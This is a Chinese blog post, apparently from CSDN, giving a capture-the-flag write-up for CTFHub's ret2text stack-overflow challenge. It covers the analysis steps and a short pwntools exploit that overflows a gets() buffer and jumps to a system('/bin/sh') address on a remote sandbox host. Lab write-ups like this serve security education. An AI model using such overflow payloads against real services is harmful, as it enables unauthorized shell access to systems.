ctfhub 技能树pwn 栈溢出 ret2text

最新推荐文章于 2024-04-14 21:44:01 发布
最新推荐文章于 2024-04-14 21:44:01 发布
阅读量548 收藏 1
点赞数
文章标签: java 服务器 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_75234353/article/details/129846336
版权

1.先checksec

 可以看到无任何的栈保护

2.IDA查看

查看main函数

 看到gets危险函数,再点开其中的v4

 看到v4这个变量的缓冲区,我们要把数据溢出到覆盖返回地址,即0x70+8

再shift+f12 直接查看相关字符

发现后门函数

 选中该行,看到下方的地址(4007B8)

编写exp.py

先vim a.py

添加如下代码

from pwn import *

p=remote("challenge-eaf789c6962da157.sandbox.ctfhub.com",32331) #ip加端口号

payload=b'a'*0x70+b'abcdefgh'+p64(0x4007B8) #b表示该字符串为byte单位;后面的“abcdefgh”为垃圾数据,随便编写,只要满足八字节;p64表示以64位打包

p.sendline(payload)

p.interactive()

 输入:wq 保存退出

运行shell

python3 a.py

ls

cat flag

 即可得flag

wbxlzd
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
入门pwn题目ret2text
03-26
入门pwn题目ret2text
pwn07.ret2syscall例题
11-11
ret2syscall例题
[CTFHub] ret2text
最新发布
Lucien_Carr的博客
04-14 531
gets_s(buffer,size)函数:从标准输入中读取数据,size表示的最多读取的数量,在这里是argv,没有定义是多大,所以我们就可以无限的输入。输入超过程序设定的字节数以后,就会发生栈溢出,多出的内容会覆盖返回地址。这个题目中要获得系统的shell,只需要先用垃圾数据填充填满数组的空间,再拼上系统system函数的返回地址就可以。只要我们能控制程序返回到0x4007B8(“/bin/sh”指令的地址),就可以得到系统的shell。我们攻击的目的主要是获得系统的控制权(也就是拿到shell)。
pwn栈溢出10道练习题有writeup
01-04
pwn栈溢出练习题目,每题都有writeup.
CTFHub 栈溢出 ret2text exp代码
柠檬i的博客
10-09 1929
CTFHub 栈溢出 ret2text exp代码
CTFHub[PWN技能树]——栈溢出
mcmuyanga的博客
12-19 2214
文章目录一、ret2text二、ret2shellcode 一、ret2text 例行检查,64位程序,没有开启任何保护 本地运行一下情况,看看大概的情况 64位ida载入,检索程序里的字符串发现了bin/sh 要满足条件才可以执行,但是我们可以直接跳转到0x4007B8去system(‘/bin/sh’) 看main函数 第8行,gets函数读入没有限制数据的长度,明显的溢出,溢出ret到执行system(‘/bin/sh’)的地址即可 from pwn import * #p=proc
CTF-PWN-callme32 [ROP+栈溢出]
SuperGate的博客
08-13 882
首先发现在pwnme函数中有一个明显的缓冲区溢出,长度为40,经调试发现填入44长度的垃圾信息即可填入shellcode ida发现一个重要函数如下: 点入后发现这三个函数为系统级调用。正好题目给了我们一个.so文件。进入查看,发现有这三个函数的反编译。依次是将加密后的flag通过key1,key2解密。调用顺序应该是callme_one -> callme_two -> c...
ret2text
weixin_56301399的博客
07-20 448
第二步还是用反汇编,获取到system函数的地址。由于要完整调用,所以取lea指令的位置0x00000000004007b8,也就是0x4007b8。第一步利用反汇编,查看变量的位置,为[rbp-0x70]。从IDA中可以看出,pwn程序只有这两个用户函数,其他的都是库函数。让返回地址,也就是EIP指向system(‘/bin/sh’)所在语句对应的内存地址就能获得shell。局部变量s是用户可以通过gets()输入的,只要达到特定的长度L,就能覆盖掉黄色的返回地址。......
CTFHUB-PWN-ret2text
m0_64180167的博客
04-16 137
然后我们可以开始写payload。下载文件 checksec看看。然后看看shell的地址是多少。放入ida64 查看字符串。然后看看主函数怎么输入。
CTFhub-pwn-[ret2shellcode]
m0_43405474的博客
08-26 1331
CTFpwn的一个关于ret2shellcode的小练习,来自CTFhub
CTF-Pwn-[BJDCTF 2nd]rci
01-09
CTF-Pwn-[BJDCTF 2nd]rci 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 ...
ret2libc2pwn 入门题
02-11
pwn 入门题
CTFHub技能树-----pwn off by null
KaliLinux_V的博客
02-03 229
【代码】CTFHub技能树-----pwn off by null。
CTFHub pwn [FastBin Attack]
KaliLinux_V的博客
01-29 271
【代码】CTFHub pwn [FastBin Attack]
PWN · ret2text】——[CTFHub]ret2text
Mr_Fmnwon的博客
04-20 1310
经典的ret2text流程。
CTFhub 技能树 PWN ret2text Python3 exp
break_cat的博客
11-17 1159
题目链接:https://www.ctfhub.com -> 技能树 -> PWN -> 栈溢出 -> ret2text WP:https://writeup.ctfhub.com/Skill/Pwn/%E6%A0%88%E6%BA%A2%E5%87%BA/eeca3548.html 搜exp的时候发现已经有人写过WP了,于是就Cirl+CV,发现原程序是用Python2写的,我的pwntools环境是Python3,因此程序需要稍作修改。 from pwn import * h
PWN shellshock [pwnable.kr]CTF writeup题解系列9
重新启程
01-02 673
破壳漏洞 操作过程 root@mypwn:/ctf/work/pwnable.kr# ssh shellshock@pwnable.kr -p2222 shellshock@pwnable.kr's password: ____ __ __ ____ ____ ____ _ ___ __ _ ____ | \| |_...
【学习笔记】CTF PWN选手的养成(一)
prettyX的博客
11-20 2113
在ichunqiu上看的视频,对学习内容进行整理,对Atum老师表示感谢。 第一章 基础知识 0X01 PWN 简介 软件安全:软件安全专注于研究软件的设计和实现的安全 研究对象:代码(源码、字节码、汇编等) 研究目标:发掘漏洞、利用漏洞、修补漏洞 研究技术:逆向工程、漏洞挖掘与利用、漏洞防御技术 CTF PWN:软件安全研究的一个缩影 研究对象:可执行文件,主要是ELF文件 研究...
ctfshow PWN 栈溢出
08-23
ctfshow PWN中,栈溢出是一种常见的攻击方式。 根据提供的引用,我了解到栈溢出是一种通过向程序输入过长的数据导致数据溢出栈的一种攻击手段。栈是一种数据结构,用于存储程序的局部变量和函数调用的返回地址等...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

wbxlzd

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值